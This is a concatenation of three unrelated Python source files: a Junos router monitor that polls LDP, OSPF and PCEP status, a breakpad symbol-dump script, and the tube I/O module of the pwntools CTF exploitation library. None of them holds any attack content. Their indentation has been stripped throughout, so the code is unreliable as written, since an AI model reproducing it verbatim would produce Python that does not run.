to_monitor = ['P1', 'P2', 'P3', 'PE1', 'PE2', 'PE3', 'PE4']
for dev_name, connected_dev in self.connected_devices.items():
if connected_dev is None:
continue
if dev_name not in to_monitor:
continue
try:
rpc_reply = connected_dev.rpc.get_ldp_session_information()
except (ConnectError, RpcError) as e:
self.safely_set_device_broken(dev_name)
else:
rpc_replies[dev_name] = rpc_reply
for dev_name, rpc_reply in rpc_replies.items():
ldp_neighbors[dev_name] = {}
ldp_neighbors[dev_name]['ldp-session-state'] = ''
ldp_neighbors[dev_name]['ldp-neighbor-address'] = ''
try:
ldp_session_xpath = rpc_reply.xpath('//ldp-session-information/ldp-session')
for ldp_session in ldp_session_xpath:
ldp_neighbors[dev_name]['ldp-session-state'] = ldp_session.xpath('.//ldp-session-state')[0].text
ldp_neighbors[dev_name]['ldp-neighbor-address'] = ldp_session.xpath('.//ldp-neighbor-address')[0].text
except Exception as e:
logger.error(e)
return ldp_neighbors
def get_ospf_neighbors(self):
o_ospf_neighbors = {}
rpc_replies = {}
to_monitor = ['P1', 'P2', 'P3', 'PE1', 'PE2', 'PE3', 'PE4']
for dev_name, connected_dev in self.connected_devices.items():
if connected_dev is None:
continue
if dev_name not in to_monitor:
continue
try:
rpc_reply = connected_dev.rpc.get_ospf_neighbor_information()
except (ConnectError, RpcError) as e:
self.safely_set_device_broken(dev_name)
else:
rpc_replies[dev_name] = rpc_reply
for dev_name, rpc_reply in rpc_replies.items():
o_ospf_neighbors[dev_name] = {}
o_ospf_neighbors[dev_name]['neighbor-address'] = ''
o_ospf_neighbors[dev_name]['ospf-neighbor-state'] = ''
o_ospf_neighbors[dev_name]['neighbor-id'] = ''
o_ospf_neighbors[dev_name]['interface-name'] = ''
try:
ospf_neighbor_xpath = rpc_reply.xpath('//ospf-neighbor-information/ospf-neighbor')
for ospf_neighbor in ospf_neighbor_xpath:
o_ospf_neighbors[dev_name]['neighbor-address'] = ospf_neighbor.xpath('.//neighbor-address')[0].text
o_ospf_neighbors[dev_name]['ospf-neighbor-state'] = ospf_neighbor.xpath('.//ospf-neighbor-state')[0].text
o_ospf_neighbors[dev_name]['neighbor-id'] = ospf_neighbor.xpath('.//neighbor-id')[0].text
o_ospf_neighbors[dev_name]['interface-name'] = ospf_neighbor.xpath('.//interface-name')[0].text
except Exception as e:
logger.error(e)
return o_ospf_neighbors
def get_ospf_interfaces(self):
o_ospf_interfaces = {}
rpc_replies = {}
to_monitor = ['P1', 'P2', 'P3', 'PE1', 'PE2', 'PE3', 'PE4']
ospf_interfaces_template = {}
ospf_interfaces_template['interface-name'] = ''
ospf_interfaces_template['ospf-area'] = ''
ospf_interfaces_template['ospf-interface-state'] = ''
for dev_name, connected_dev in self.connected_devices.items():
if connected_dev is None:
continue
if dev_name not in to_monitor:
continue
try:
rpc_reply = connected_dev.rpc.get_ospf_interface_information()
except (ConnectError, RpcError) as e:
self.safely_set_device_broken(dev_name)
else:
rpc_replies[dev_name] = rpc_reply
for dev_name, rpc_reply in rpc_replies.items():
try:
ospf_interfaces_xpath = rpc_reply.xpath('//ospf-interface-information/ospf-interface')
o_ospf_interfaces[dev_name] = []
for i, ospf_interface in enumerate(ospf_interfaces_xpath):
o_ospf_interface = deepcopy(ospf_interfaces_template)
o_ospf_interface['interface-name'] = ospf_interface.xpath('.//interface-name')[0].text
o_ospf_interface['ospf-area'] = ospf_interface.xpath('.//ospf-area')[0].text
o_ospf_interface['ospf-interface-state'] = ospf_interface.xpath('.//ospf-interface-state')[0].text
o_ospf_interfaces[dev_name].append(o_ospf_interface)
except Exception as e:
logger.error(e)
return o_ospf_interfaces
def get_pcep_statuses(self):
o_pcep_statuses = {}
rpc_replies = {}
to_monitor = ['P1', 'P2', 'P3', 'PE1', 'PE2', 'PE3', 'PE4']
pcep_statuses_template = {}
pcep_statuses_template['session-name'] = ''
pcep_statuses_template['session-type'] = ''
pcep_statuses_template['session-provisioning'] = ''
pcep_statuses_template['session-status'] = ''
for dev_name, connected_dev in self.connected_devices.items():
if connected_dev is None:
continue
if dev_name not in to_monitor:
continue
try:
rpc_reply = connected_dev.rpc.get_path_computation_client_status()
except (ConnectError, RpcError) as e:
self.safely_set_device_broken(dev_name)
else:
rpc_replies[dev_name] = rpc_reply
for dev_name, rpc_reply in rpc_replies.items():
try:
pcep_status_xpath = rpc_reply.xpath('//path-computation-client-status/pcc-status-sessions/pcc-status-sessions-entry')
o_pcep_statuses[dev_name] = []
for i, pcep_status in enumerate(pcep_status_xpath):
o_pcep_status = deepcopy(pcep_statuses_template)
o_pcep_status['session-name'] = pcep_status.xpath('.//session-name')[0].text
o_pcep_status['session-type'] = pcep_status.xpath('.//session-type')[0].text
o_pcep_status['session-provisioning'] = pcep_status.xpath('.//session-provisioning')[0].text
o_pcep_status['session-status'] = pcep_status.xpath('.//session-status')[0].text
o_pcep_statuses[dev_name].append(o_pcep_status)
except Exception as e:
logger.error(e)
return o_pcep_statuses
def monitor_oper_status(self, interface_status):
for device_name, interfaces in interface_status.items():
oper_status = True
for interface_name, interface in interfaces.items():
if interface['oper-status'] == 'down':
oper_status = False
break
if oper_status is False:
event = self._create_event(name='oper_status.interface.down.{}'.format(device_name),
type='cli',
priority='critical',
body={device_name: interfaces})
self.add_event_to_db(event)
else:
event = self._create_event(name='oper_status.interface.up.{}'.format(device_name),
type='cli',
priority='information',
body={device_name: interfaces})
self.add_event_to_db(event)
def monitor_admin_status(self, interface_status):
for device_name, interfaces in interface_status.items():
admin_status = True
for interface_name, interface in interfaces.items():
if interface['admin-status'] == 'down':
admin_status = False
break
if admin_status is False:
event = self._create_event(name='admin_status.interface.down.{}'.format(device_name),
type='cli',
priority='critical',
body={device_name: interfaces})
self.add_event_to_db(event)
else:
event = self._create_event(name='admin_status.interface.up.{}'.format(device_name),
type='cli',
priority='information',
body={device_name: interfaces})
self.add_event_to_db(event)
def monitor_bgp_peers(self, bgp_peer_count):
for device_name, bgp_peer_count in bgp_peer_count.items():
if bgp_peer_count['down-peer-count'] == 0:
event = self._create_event(name='bgp.peers.up.{}'.format(device_name),
type='cli',
priority='information',
body={device_name: {
'up-peer-count': bgp_peer_count['peer-count'] - bgp_peer_count['down-peer-count'],
'down-peer-count': bgp_peer_count['down-peer-count'],
}})
self.add_event_to_db(event)
else:
event = self._create_event(name='bgp.peers.down.{}'.format(device_name),
type='cli',
priority='critical',
body={device_name: {
'up-peer-count': bgp_peer_count['peer-count'] - bgp_peer_count['down-peer-count'],
'down-peer-count': bgp_peer_count['down-peer-count'],
}})
self.add_event_to_db(event)
def monitor_ldp_session(self, ldp_neighbors):
for device_name, ldp_neighbor in ldp_neighbors.items():
if ldp_neighbor['ldp-session-state'] == 'Operational':
event = self._create_event(name='ldp.session.up.{}'.format(device_name),
type='cli',
priority='information',
body={device_name: ldp_neighbor})
self.add_event_to_db(event)
else:
event = self._create_event(name='ldp.session.down.{}'.format(device_name),
type='cli',
priority='critical',
body={device_name: ldp_neighbor})
self.add_event_to_db(event)
def monitor_ospf_neighbors(self, ospf_neighbors):
for device_name, ospf_neighbor in ospf_neighbors.items():
if ospf_neighbor['ospf-neighbor-state'] == 'Full':
event = self._create_event(name='ospf.neighbors.up.{}'.format(device_name),
type='cli',
priority='information',
body={device_name: ospf_neighbor})
self.add_event_to_db(event)
else:
event = self._create_event(name='ospf.neighbors.down.{}'.format(device_name),
type='cli',
priority='critical',
body={device_name: ospf_neighbor})
self.add_event_to_db(event)
def monitor_pcep_statuses(self, pcep_statuses):
for device_name, pcep_status in pcep_statuses.items():
status = True
for pcep_session in pcep_status:
if pcep_session['session-status'] != 'Up':
status = False
break
if status is True:
event = self._create_event(name='pcep.status.up.{}'.format(device_name),
type='cli',
priority='information',
body={device_name: pcep_status})
self.add_event_to_db(event)
else:
event = self._create_event(name='pcep.status.down.{}'.format(device_name),
type='cli',
priority='critical',
body={device_name: pcep_status})
self.add_event_to_db(event)
def monitor_ospf_interfaces(self, d_ospf_interfaces):
for device_name, ospf_interfaces in d_ospf_interfaces.items():
status = True
for ospf_interface in ospf_interfaces:
if ospf_interface['ospf-interface-state'] == 'Down':
status = False
break
if status is True:
event = self._create_event(name='ospf.interfaces.up.{}'.format(device_name),
type='cli',
priority='information',
body={device_name: ospf_interfaces})
self.add_event_to_db(event)
else:
event = self._create_event(name='ospf.interfaces.down.{}'.format(device_name),
type='cli',
priority='critical',
body={device_name: ospf_interfaces})
self.add_event_to_db(event)
if __name__ == '__main__':
jc = JunosCollector(config_path='../config/devices.yaml')
|
generate_breakpad_symbols.py
|
#!/usr/bin/env python
# Copyright (c) 2013 GitHub, Inc. All rights reserved.
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Convert pdb to sym for given directories"""
import errno
import glob
import optparse
import os
import Queue
import re
import shutil
import subprocess
import sys
import threading
CONCURRENT_TASKS=4
SOURCE_ROOT=os.path.abspath(os.path.dirname(os.path.dirname(os.path.dirname(__file__))))
DUMP_SYMS=os.path.join(SOURCE_ROOT, 'vendor', 'breakpad', 'dump_syms.exe')
def GetCommandOutput(command):
"""Runs the command list, returning its output.
Prints the given command (which should be a list of one or more strings),
then runs it and returns its output (stdout) as a string.
From chromium_utils.
"""
devnull = open(os.devnull, 'w')
proc = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=devnull,
bufsize=1)
output = proc.communicate()[0]
return output
def mkdir_p(path):
"""Simulates mkdir -p."""
try:
os.makedirs(path)
except OSError as e:
if e.errno == errno.EEXIST and os.path.isdir(path):
pass
else: raise
def RegisterRequiredDll():
register = os.path.join(os.path.dirname(__file__), 'register_msdia80_dll.js')
  subprocess.check_call(['node.exe', register])
def GenerateSymbols(options, binaries):
"""Dumps the symbols of binary and places them in the given directory."""
queue = Queue.Queue()
print_lock = threading.Lock()
def _Worker():
while True:
binary = queue.get()
if options.verbose:
with print_lock:
print "Generating symbols for %s" % binary
syms = GetCommandOutput([DUMP_SYMS, binary])
module_line = re.match("MODULE [^ ]+ [^ ]+ ([0-9A-Fa-f]+) (.*)\r\n", syms)
      if module_line is None:
with print_lock:
print "Failed to get symbols for %s" % binary
queue.task_done()
continue
output_path = os.path.join(options.symbols_dir, module_line.group(2),
module_line.group(1))
mkdir_p(output_path)
symbol_file = "%s.sym" % module_line.group(2)[:-4] # strip .pdb
f = open(os.path.join(output_path, symbol_file), 'w')
f.write(syms)
f.close()
queue.task_done()
for binary in binaries:
queue.put(binary)
for _ in range(options.jobs):
t = threading.Thread(target=_Worker)
t.daemon = True
t.start()
queue.join()
def main():
parser = optparse.OptionParser()
parser.add_option('', '--symbols-dir', default='',
help='The directory where to write the symbols file.')
parser.add_option('', '--clear', default=False, action='store_true',
help='Clear the symbols directory before writing new '
'symbols.')
parser.add_option('-j', '--jobs', default=CONCURRENT_TASKS, action='store',
type='int', help='Number of parallel tasks to run.')
parser.add_option('-v', '--verbose', action='store_true',
help='Print verbose status output.')
(options, directories) = parser.parse_args()
if not options.symbols_dir:
print "Required option --symbols-dir missing."
return 1
if options.clear:
try:
shutil.rmtree(options.symbols_dir)
except:
pass
pdbs = []
for directory in directories:
pdbs += glob.glob(os.path.join(directory, '*.exe.pdb'))
pdbs += glob.glob(os.path.join(directory, '*.dll.pdb'))
  RegisterRequiredDll()
GenerateSymbols(options, pdbs)
return 0
if '__main__' == __name__:
sys.exit(main())
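
# Hedged example invocation (paths are placeholders, not taken from this
# script); dumps symbols for every *.exe.pdb / *.dll.pdb found under
# out\Release into out\symbols using up to four concurrent dump_syms workers:
#
#   python generate_breakpad_symbols.py --symbols-dir=out\symbols -v out\Release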
|
tube.py
|
# -*- coding: utf-8 -*-
from .buffer import Buffer
from ..timeout import Timeout
from .. import term, atexit, context
from ..util import misc, fiddling
from ..log import getLogger, getPerformanceLogger
import re, threading, sys, time, subprocess, logging, string
log = getLogger(__name__)
dumplog = getPerformanceLogger(__name__ + '.dump')
class tube(Timeout):
"""
    Container of all the tube functions common to sockets, TTYs and SSH connections.
"""
default = Timeout.default
forever = Timeout.forever
#: Delimiter to use for :meth:`sendline`, :meth:`recvline`,
#: and related functions.
newline = '\n'
def __init__(self, timeout = default):
super(tube, self).__init__(timeout)
self.buffer = Buffer()
atexit.register(self.close)
# Functions based on functions from subclasses
def recv(self, numb = 4096, timeout = default):
r"""recv(numb = 4096, timeout = default) -> str
Receives up to `numb` bytes of data from the tube, and returns
as soon as any quantity of data is available.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Raises:
exceptions.EOFError: The connection is closed
Returns:
A string containing bytes received from the socket,
or ``''`` if a timeout occurred while waiting.
Examples:
>>> t = tube()
>>> # Fake a data source
>>> t.recv_raw = lambda n: 'Hello, world'
>>> t.recv() == 'Hello, world'
True
>>> t.unrecv('Woohoo')
>>> t.recv() == 'Woohoo'
True
>>> with context.local(log_level='debug'):
... _ = t.recv() # doctest: +ELLIPSIS
[...] Received 0xc bytes:
'Hello, world'
"""
return self._recv(numb, timeout) or ''
def unrecv(self, data):
"""unrecv(data)
Puts the specified data back at the beginning of the receive
buffer.
Examples:
.. doctest::
>>> t = tube()
>>> t.recv_raw = lambda n: 'hello'
>>> t.recv()
'hello'
>>> t.recv()
'hello'
>>> t.unrecv('world')
>>> t.recv()
'world'
>>> t.recv()
'hello'
"""
self.buffer.unget(data)
def _fillbuffer(self, timeout = default):
"""_fillbuffer(timeout = default)
Fills the internal buffer from the pipe, by calling
:meth:`recv_raw` exactly once.
Returns:
The bytes of data received, or ``''`` if no data was received.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda *a: 'abc'
>>> len(t.buffer)
0
>>> t._fillbuffer()
'abc'
>>> len(t.buffer)
3
"""
data = ''
with self.local(timeout):
data = self.recv_raw(4096)
if data and dumplog.isEnabledFor(logging.DEBUG):
dumplog.debug('Received %#x bytes:' % len(data))
if all(c in string.printable for c in data):
for line in data.splitlines(True):
dumplog.indented(repr(line), level = logging.DEBUG)
else:
dumplog.indented(fiddling.hexdump(data), level = logging.DEBUG)
if data:
self.buffer.add(data)
return data
def _recv(self, numb = 4096, timeout = default):
"""_recv(numb = 4096, timeout = default) -> str
        Receives one chunk from the internal buffer, or from the OS if the
buffer is empty.
"""
data = ''
# No buffered data, could not put anything in the buffer
# before timeout.
if not self.buffer and not self._fillbuffer(timeout):
return ''
return self.buffer.get(numb)
def recvpred(self, pred, timeout = default):
"""recvpred(pred, timeout = default) -> str
Receives one byte at a time from the tube, until ``pred(bytes)``
evaluates to True.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
pred(callable): Function to call, with the currently-accumulated data.
timeout(int): Timeout for the operation
Raises:
exceptions.EOFError: The connection is closed
Returns:
A string containing bytes received from the socket,
or ``''`` if a timeout occurred while waiting.
"""
data = ''
with self.countdown(timeout):
while not pred(data):
try:
res = self.recv(1)
except:
self.unrecv(data)
return ''
if res:
data += res
else:
self.unrecv(data)
return ''
return data
def recvn(self, numb, timeout = default):
"""recvn(numb, timeout = default) -> str
        Receives exactly `numb` bytes.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Raises:
exceptions.EOFError: The connection closed before the request could be satisfied
Returns:
A string containing bytes received from the socket,
or ``''`` if a timeout occurred while waiting.
Examples:
.. doctest::
>>> t = tube()
>>> data = 'hello world'
>>> t.recv_raw = lambda *a: data
>>> t.recvn(len(data)) == data
True
>>> t.recvn(len(data)+1) == data + data[0]
True
>>> t.recv_raw = lambda *a: None
>>> # The remaining data is buffered
>>> t.recv() == data[1:]
True
>>> t.recv_raw = lambda *a: time.sleep(0.01) or 'a'
>>> t.recvn(10, timeout=0.05)
''
>>> t.recvn(10, timeout=0.05)
'aaaaaaaaaa'
"""
# Keep track of how much data has been received
# It will be pasted together at the end if a
# timeout does not occur, or put into the tube buffer.
with self.countdown(timeout):
while self.countdown_active() and len(self.buffer) < numb and self._fillbuffer(self.timeout):
pass
if len(self.buffer) < numb:
return ''
return self.buffer.get(numb)
def recvuntil(self, delims, drop=False, timeout = default):
"""recvuntil(delims, timeout = default) -> str
        Receive data until one of `delims` is encountered.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
        Arguments:
            delims(str,tuple): String of delimiter characters, or list of delimiter strings.
drop(bool): Drop the ending. If ``True`` it is removed from the end of the return value.
Raises:
exceptions.EOFError: The connection closed before the request could be satisfied
Returns:
A string containing bytes received from the socket,
or ``''`` if a timeout occurred while waiting.
Examples:
.. doctest::
>>> t = tube()
>>> t.recv_raw = lambda n: "Hello World!"
>>> t.recvuntil(' ')
'Hello '
>>> _=t.clean(0)
>>> # Matches on 'o' in 'Hello'
>>> t.recvuntil(tuple(' Wor'))
'Hello'
>>> _=t.clean(0)
>>> # Matches expressly full string
>>> t.recvuntil(' Wor')
'Hello Wor'
>>> _=t.clean(0)
>>> # Matches on full string, drops match
>>> t.recvuntil(' Wor', drop=True)
'Hello'
>>> # Try with regex special characters
>>> t = tube()
>>> t.recv_raw = lambda n: "Hello|World"
>>> t.recvuntil('|', drop=True)
'Hello'
"""
        # Convert string into a singleton tuple
if isinstance(delims, (str, unicode)):
delims = (delims,)
# Longest delimiter for tracking purposes
longest = max(map(len, delims))
# Cumulative data to search
data = []
top = ''
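        # Only `top` is scanned for a delimiter on each pass; once it grows
        # longer than the longest delimiter, the prefix that can no longer be
        # part of a match is moved into `data`, and just the trailing
        # ``longest + 1`` bytes are kept in `top` for the next scan.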
with self.countdown(timeout):
while self.countdown_active():
try:
res = self.recv(timeout=self.timeout)
except:
self.unrecv(''.join(data) + top)
raise
if not res:
self.unrecv(''.join(data) + top)
return ''
top += res
start = len(top)
for d in delims:
j = top.find(d)
if start > j > -1:
start = j
end = j + len(d)
if start < len(top):
self.unrecv(top[end:])
if drop:
top = top[:start]
else:
top = top[:end]
return ''.join(data) + top
if len(top) > longest:
i = -longest - 1
data.append(top[:i])
top = top[i:]
return ''
def recvlines(self, numlines, keepends = False, timeout = default):
r"""recvlines(numlines, keepends = False, timeout = default) -> str list
        Receive up to ``numlines`` lines.
A "line" is any sequence of bytes terminated by the byte sequence
set by :attr:`newline`, which defaults to ``'\n'``.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
numlines(int): Maximum number of lines to receive
keepends(bool): Keep newlines at the end of each line (``False``).
timeout(int): Maximum timeout
Raises:
exceptions.EOFError: The connection closed before the request could be satisfied
Returns:
            A list of the lines received, each stripped of its trailing
            newline unless ``keepends`` is ``True``.
Examples:
.. doctest::
>>> t = tube()
>>> t.recv_raw = lambda n: '\n'
>>> t.recvlines(3)
['', '', '']
>>> t.recv_raw = lambda n: 'Foo\nBar\nBaz\n'
>>> t.recvlines(3)
['Foo', 'Bar', 'Baz']
>>> t.recvlines(3, True)
['Foo\n', 'Bar\n', 'Baz\n']
"""
lines = []
with self.countdown(timeout):
for _ in xrange(numlines):
try:
# We must set 'keepends' to True here so that we can
# restore the original, unmodified data to the buffer
# in the event of a timeout.
res = self.recvline(keepends=True, timeout=timeout)
except:
self.unrecv(''.join(lines))
raise
if res:
lines.append(res)
else:
break
if not keepends:
lines = [line.rstrip(self.newline) for line in lines]
return lines
def recvline(self, keepends = True, timeout = default):
r"""recvline(keepends = True) -> str
Receive a single line from the tube.
A "line" is any sequence of bytes terminated by the byte sequence
set in :attr:`newline`, which defaults to ``'\n'``.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
keepends(bool): Keep the line ending (``True``).
timeout(int): Timeout
Return:
All bytes received over the tube until the first
newline ``'\n'`` is received. Optionally retains
the ending.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: 'Foo\nBar\r\nBaz\n'
>>> t.recvline()
'Foo\n'
>>> t.recvline()
'Bar\r\n'
>>> t.recvline(keepends = False)
'Baz'
>>> t.newline = '\r\n'
>>> t.recvline(keepends = False)
'Foo\nBar'
"""
return self.recvuntil(self.newline, drop = not keepends, timeout = timeout)
def recvline_pred(self, pred, keepends = False, timeout = default):
r"""recvline_pred(pred, keepends = False) -> str
Receive data until ``pred(line)`` returns a truthy value.
Drop all other data.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
pred(callable): Function to call. Returns the line for which
this function returns ``True``.
Examples:
.. doctest::
>>> t = tube()
>>> t.recv_raw = lambda n: "Foo\nBar\nBaz\n"
>>> t.recvline_pred(lambda line: line == "Bar\n")
'Bar'
>>> t.recvline_pred(lambda line: line == "Bar\n", keepends=True)
'Bar\n'
>>> t.recvline_pred(lambda line: line == 'Nope!', timeout=0.1)
''
"""
tmpbuf = Buffer()
line = ''
with self.countdown(timeout):
while self.countdown_active():
try:
line = self.recvline(keepends=True)
except:
self.buffer.add(tmpbuf)
raise
if not line:
self.buffer.add(tmpbuf)
return ''
if pred(line):
if not keepends:
line = line[:-len(self.newline)]
return line
else:
tmpbuf.add(line)
return ''
def recvline_contains(self, items, keepends = False, timeout = default):
r"""
Receive lines until one line is found which contains at least
one of `items`.
Arguments:
items(str,tuple): List of strings to search for, or a single string.
keepends(bool): Return lines with newlines if ``True``
timeout(int): Timeout, in seconds
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: "Hello\nWorld\nXylophone\n"
>>> t.recvline_contains('r')
'World'
>>> f = lambda n: "cat dog bird\napple pear orange\nbicycle car train\n"
>>> t = tube()
>>> t.recv_raw = f
>>> t.recvline_contains('pear')
'apple pear orange'
>>> t = tube()
>>> t.recv_raw = f
>>> t.recvline_contains(('car', 'train'))
'bicycle car train'
"""
if isinstance(items, (str,unicode)):
items = (items,)
def pred(line):
return any(d in line for d in items)
return self.recvline_pred(pred, keepends, timeout)
def recvline_startswith(self, delims, keepends = False, timeout = default):
r"""recvline_startswith(delims, keepends = False, timeout = default) -> str
        Keep receiving lines until one is found that starts with one of
        `delims`. Returns the last line received.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
delims(str,tuple): List of strings to search for, or string of single characters
keepends(bool): Return lines with newlines if ``True``
timeout(int): Timeout, in seconds
Returns:
The first line received which starts with a delimiter in ``delims``.
Examples:
.. doctest::
>>> t = tube()
>>> t.recv_raw = lambda n: "Hello\nWorld\nXylophone\n"
>>> t.recvline_startswith(tuple('WXYZ'))
'World'
>>> t.recvline_startswith(tuple('WXYZ'), True)
'Xylophone\n'
>>> t.recvline_startswith('Wo')
'World'
"""
        # Convert string into a singleton tuple
if isinstance(delims, (str, unicode)):
delims = (delims,)
return self.recvline_pred(lambda line: any(map(line.startswith, delims)),
keepends=keepends,
timeout=timeout)
def recvline_endswith(self, delims, keepends = False, timeout = default):
r"""recvline_endswith(delims, keepends = False, timeout = default) -> str
        Keep receiving lines until one is found that ends with one of
        `delims`. Returns the last line received.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
See :meth:`recvline_startswith` for more details.
Examples:
.. doctest::
>>> t = tube()
>>> t.recv_raw = lambda n: 'Foo\nBar\nBaz\nKaboodle\n'
>>> t.recvline_endswith('r')
'Bar'
>>> t.recvline_endswith(tuple('abcde'), True)
'Kaboodle\n'
>>> t.recvline_endswith('oodle')
'Kaboodle'
"""
        # Convert string into a singleton tuple
if isinstance(delims, (str, unicode)):
delims = (delims,)
delims = tuple(delim + self.newline for delim in delims)
return self.recvline_pred(lambda line: any(map(line.endswith, delims)),
keepends=keepends,
timeout=timeout)
def recvregex(self, regex, exact = False, timeout = default):
"""recvregex(regex, exact = False, timeout = default) -> str
Wrapper around :func:`recvpred`, which will return when a regex
matches the string in the buffer.
By default :func:`re.RegexObject.search` is used, but if `exact` is
set to True, then :func:`re.RegexObject.match` will be used instead.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
"""
if isinstance(regex, (str, unicode)):
regex = re.compile(regex)
if exact:
pred = regex.match
else:
pred = regex.search
return self.recvpred(pred, timeout = timeout)
def recvline_regex(self, regex, exact = False, keepends = False, timeout = default):
"""recvregex(regex, exact = False, keepends = False, timeout = default) -> str
Wrapper around :func:`recvline_pred`, which will return when a regex
matches a line.
By default :func:`re.RegexObject.search` is used, but if `exact` is
set to True, then :func:`re.RegexObject.match` will be used instead.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
"""
if isinstance(regex, (str, unicode)):
regex = re.compile(regex)
if exact:
pred = regex.match
else:
pred = regex.search
return self.recvline_pred(pred, keepends = keepends, timeout = timeout)
def recvrepeat(self, timeout = default):
"""recvrepeat()
Receives data until a timeout or EOF is reached.
Examples:
>>> data = [
... 'd',
... '', # simulate timeout
... 'c',
... 'b',
... 'a',
... ]
>>> def delayrecv(n, data=data):
... return data.pop()
>>> t = tube()
>>> t.recv_raw = delayrecv
>>> t.recvrepeat(0.2)
'abc'
>>> t.recv()
'd'
"""
try:
while self._fillbuffer(timeout=timeout):
pass
except EOFError:
pass
return self.buffer.get()
def recvall(self, timeout=Timeout.forever):
"""recvall() -> str
Receives data until EOF is reached.
"""
        with log.waitfor('Receiving all data') as h:
l = len(self.buffer)
with self.local(timeout):
try:
while True:
l = misc.size(len(self.buffer))
h.status(l)
if not self._fillbuffer():
break
except EOFError:
pass
h.success("Done (%s)" % l)
self.close()
return self.buffer.get()
def send(self, data):
"""send(data)
Sends data.
If log level ``DEBUG`` is enabled, also prints out the data
received.
If it is not possible to send anymore because of a closed
connection, it raises ``exceptions.EOFError``
Examples:
>>> def p(x): print repr(x)
>>> t = tube()
>>> t.send_raw = p
>>> t.send('hello')
'hello'
"""
if dumplog.isEnabledFor(logging.DEBUG):
log.debug('Sent %#x bytes:' % len(data))
if all(c in string.printable for c in data):
for line in data.splitlines(True):
log.indented(repr(line), level = logging.DEBUG)
else:
log.indented(fiddling.hexdump(data), level = logging.DEBUG)
self.send_raw(data)
def sendline(self, line):
r"""sendline(data)
Shorthand for ``t.send(data + t.newline)``.
Examples:
>>> def p(x): print repr(x)
>>> t = tube()
>>> t.send_raw = p
>>> t.sendline('hello')
'hello\n'
>>> t.newline = '\r\n'
>>> t.sendline('hello')
'hello\r\n'
"""
self.send(line + self.newline)
def sendafter(self, delim, data, timeout = default):
"""sendafter(delim, data, timeout = default) -> str
A combination of ``recvuntil(delim, timeout)`` and ``send(data)``.
"""
res = self.recvuntil(delim, timeout)
self.send(data)
return res
def sendlineafter(self, delim, data, timeout = default):
"""sendlineafter(delim, data, timeout = default) -> str
A combination of ``recvuntil(delim, timeout)`` and ``sendline(data)``."""
res = self.recvuntil(delim, timeout)
self.sendline(data)
return res
def sendthen(self, delim, data, timeout = default):
"""sendthen(delim, data, timeout = default) -> str
A combination of ``send(data)`` and ``recvuntil(delim, timeout)``."""
self.send(data)
return self.recvuntil(delim, timeout)
def sendlinethen(self, delim, data, timeout = default):
"""sendlinethen(delim, data, timeout = default) -> str
A combination of ``sendline(data)`` and ``recvuntil(delim, timeout)``."""
self.send(data + self.newline)
return self.recvuntil(delim, timeout)
def interactive(self, prompt = term.text.bold_red('$') + ' '):
"""interactive(prompt = pwnlib.term.text.bold_red('$') + ' ')
Does simultaneous reading and writing to the tube. In principle this just
connects the tube to standard in and standard out, but in practice this
is much more usable, since we are using :mod:`pwnlib.term` to print a
floating prompt.
        Thus it only works while in :data:`pwnlib.term.term_mode`.
"""
log.info('Switching to interactive mode')
go = threading.Event()
def recv_thread():
while not go.isSet():
try:
cur = self.recv(timeout = 0.05)
if cur:
sys.stderr.write(cur)
sys.stderr.flush()
except EOFError:
log.info('Got EOF while reading in interactive')
break
t = context.Thread(target = recv_thread)
t.daemon = True
t.start()
try:
while not go.isSet():
if term.term_mode:
data = term.readline.readline(prompt = prompt, float = True)
else:
data = sys.stdin.read(1)
if data:
try:
self.send(data)
except EOFError:
go.set()
log.info('Got EOF while sending in interactive')
else:
go.set()
except KeyboardInterrupt:
log.info('Interrupted')
go.set()
while t.is_alive():
t.join(timeout = 0.1)
def clean(self, timeout = 0.05):
"""clean(timeout = 0.05)
Removes all the buffered data from a tube by calling
:meth:`pwnlib.tubes.tube.tube.recv` with a low timeout until it fails.
If ``timeout`` is zero, only cached data will be cleared.
Note: If timeout is set to zero, the underlying network is
not actually polled; only the internal buffer is cleared.
Returns:
All data received
Examples:
>>> t = tube()
>>> t.unrecv('clean me up')
>>> t.clean(0)
'clean me up'
>>> len(t.buffer)
0
"""
if timeout == 0:
return self.buffer.get()
return self.recvrepeat(timeout)
def clean_and_log(self, timeout = 0.05):
r"""clean_and_log(timeout = 0.05)
        Works exactly as :meth:`pwnlib.tubes.tube.tube.clean`, but logs received
data with :meth:`pwnlib.log.info`.
Returns:
All data received
Examples:
>>> def recv(n, data=['', 'hooray_data']):
... while data: return data.pop()
>>> t = tube()
>>> t.recv_raw = recv
>>> t.connected_raw = lambda d: True
>>> t.fileno = lambda: 1234
>>> with context.local(log_level='info'):
... data = t.clean_and_log() #doctest: +ELLIPSIS
'hooray_data'
>>> data
'hooray_data'
>>> context.clear()
"""
data = self.clean(timeout)
if all(c in string.printable for c in data):
for line in data.splitlines(True):
log.indented(repr(line))
else:
log.indented(fiddling.hexdump(data))
return data
def connect_input(self, other):
"""connect_input(other)
Connects the input of this tube to the output of another tube object.
Examples:
>>> def p(x): print x
>>> def recvone(n, data=['data']):
... while data: return data.pop()
... raise EOFError
>>> a = tube()
>>> b = tube()
>>> a.recv_raw = recvone
>>> b.send_raw = p
>>> a.connected_raw = lambda d: True
>>> b.connected_raw = lambda d: True
>>> a.shutdown = lambda d: True
>>> b.shutdown = lambda d: True
>>> import time
